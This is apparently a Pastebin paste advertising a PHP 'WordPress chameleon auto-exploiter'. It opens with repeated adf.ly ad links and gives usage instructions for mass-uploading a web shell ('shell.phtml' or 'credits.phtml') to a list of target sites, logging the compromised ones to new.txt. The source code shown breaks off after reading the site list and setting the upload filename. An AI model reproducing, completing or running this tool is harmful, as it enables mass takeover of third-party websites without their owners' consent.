akhilistroy

WordPress chameleon auto-exploiter

Nov 26th, 2014
204
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.62 KB | None | 0 0
  1. ...........................http://adf.ly/ufiwP.......................
  2. ...........................http://adf.ly/ufiwP.......................
  3. ...........................http://adf.ly/ufiwP.......................
  4. ...........................http://adf.ly/ufiwP.......................
  5.  
  6.  
  7. Name your shell as shell.phtml or credits.phtml
  8.  
  9. Usage: php file.php lista.txt
  10.  
  11. All sites with shell uploaded will be saved in new.txt
  12.  
  13.  
  14. Source code:
  15.  
  16.  
  17. <?php
  18.  
  19.  
  20.  
  21. echo "chameleon auto-exploiter by KkK1337";
  22.  
  23.  
  24.  
  25. $x=file($argv[1]);
  26.  
  27. foreach ($x as $sites){
  28.  
  29. $sites=trim($sites);
  30.  
  31. $uploadfile="credits.phtml";
  32. ....................
Add Comment
Please, Sign In to add comment